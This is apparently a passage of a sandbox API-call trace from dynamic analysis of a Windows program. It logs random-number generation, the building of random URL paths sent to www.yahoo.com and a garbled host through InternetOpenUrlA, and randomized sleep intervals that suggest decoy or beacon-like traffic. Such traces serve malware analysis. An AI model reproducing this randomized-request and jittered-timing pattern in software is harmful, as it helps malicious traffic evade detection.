0x7ffc5bcc36b0 [0264.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.831] GetProcessHeap () returned 0x440000 [0264.831] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472b10 [0264.832] lstrcpyA (in: lpString1=0x472b10, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0264.832] lstrcatA (in: lpString1="\x81\x03", lpString2="/LdVlnbuu2e7f6A6Crpbiijgtxtjtf/d3tZ406khxpF5lcwv73jvYObyd4n/x7ch67iYGw2jiE46gb75/4Mh6mdoV4eh15Ht4RzytbqhppiX1of7bv1ig8vl/9IDFqgaqgf3HvbpBg5zJkChqLbsgcvabOvbp3k9g/" | out: lpString1="\x81\x03/LdVlnbuu2e7f6A6Crpbiijgtxtjtf/d3tZ406khxpF5lcwv73jvYObyd4n/x7ch67iYGw2jiE46gb75/4Mh6mdoV4eh15Ht4RzytbqhppiX1of7bv1ig8vl/9IDFqgaqgf3HvbpBg5zJkChqLbsgcvabOvbp3k9g/") returned="\x81\x03/LdVlnbuu2e7f6A6Crpbiijgtxtjtf/d3tZ406khxpF5lcwv73jvYObyd4n/x7ch67iYGw2jiE46gb75/4Mh6mdoV4eh15Ht4RzytbqhppiX1of7bv1ig8vl/9IDFqgaqgf3HvbpBg5zJkChqLbsgcvabOvbp3k9g/" [0264.832] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0264.832] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/LdVlnbuu2e7f6A6Crpbiijgtxtjtf/d3tZ406khxpF5lcwv73jvYObyd4n/x7ch67iYGw2jiE46gb75/4Mh6mdoV4eh15Ht4RzytbqhppiX1of7bv1ig8vl/9IDFqgaqgf3HvbpBg5zJkChqLbsgcvabOvbp3k9g/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0264.832] GetProcessHeap () returned 0x440000 [0264.832] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472b10 | out: hHeap=0x440000) returned 1 [0264.832] GetProcessHeap () returned 0x440000 [0264.832] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a02350 | out: hHeap=0x440000) returned 1 [0264.832] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0264.832] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0264.833] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0264.833] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0264.833] Sleep (dwMilliseconds=0x1d0ed) [0264.949] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.949] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0264.949] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.949] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0264.949] GetProcessHeap () returned 0x440000 [0264.949] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a17840 [0264.949] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.949] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0264.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17841, cbBuffer=0x1b, dwFlags=0x2 | out: pbBuffer=0x3a17841) returned 0x0 [0264.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.952] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.952] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.952] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.952] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0264.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0264.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0264.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0264.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0264.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1785c, cbBuffer=0x13, dwFlags=0x2 | out: pbBuffer=0x3a1785c) returned 0x0 [0264.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.105] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0265.105] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0265.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0265.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.107] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.107] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.107] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0265.107] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.108] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.108] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0265.108] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.108] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.109] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0265.109] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1786f, cbBuffer=0x20, dwFlags=0x2 | out: pbBuffer=0x3a1786f) returned 0x0 [0265.109] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.109] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0265.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0265.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.112] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.112] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.112] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.112] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.113] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.113] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0265.113] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.113] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0265.113] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0265.114] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0265.114] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0265.114] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0265.114] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0265.115] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.115] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.115] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.116] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.116] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0265.116] GetProcessHeap () returned 0x440000 [0265.116] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0265.116] lstrcpyA (in: lpString1=0x472f30, lpString2="\x018(÷s://www.yahoo.com" | out: lpString1="\x018(÷s://www.yahoo.com") returned="\x018(÷s://www.yahoo.com" [0265.116] lstrcatA (in: lpString1="\x018(÷s://www.yahoo.com", lpString2="/0yvz88osTgpexfx8AQMeLfN7id/ns5ufF49noc1zv9oih/pjDor1ylxqueEelHn3o48282ITbzgsb/" | out: lpString1="\x018(÷s://www.yahoo.com/0yvz88osTgpexfx8AQMeLfN7id/ns5ufF49noc1zv9oih/pjDor1ylxqueEelHn3o48282ITbzgsb/") returned="\x018(÷s://www.yahoo.com/0yvz88osTgpexfx8AQMeLfN7id/ns5ufF49noc1zv9oih/pjDor1ylxqueEelHn3o48282ITbzgsb/" [0265.117] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0265.117] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x018(÷s://www.yahoo.com/0yvz88osTgpexfx8AQMeLfN7id/ns5ufF49noc1zv9oih/pjDor1ylxqueEelHn3o48282ITbzgsb/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0265.117] GetProcessHeap () returned 0x440000 [0265.117] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0265.117] GetProcessHeap () returned 0x440000 [0265.117] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a17840 | out: hHeap=0x440000) returned 1 [0265.117] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0265.117] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0265.120] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0265.120] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0265.120] Sleep (dwMilliseconds=0x1574c) [0265.279] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.279] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0265.280] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.280] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0265.280] GetProcessHeap () returned 0x440000 [0265.280] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0265.280] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.280] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0265.280] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0265.280] BCryptGenRandom (in: hAlgorithm=0x0, 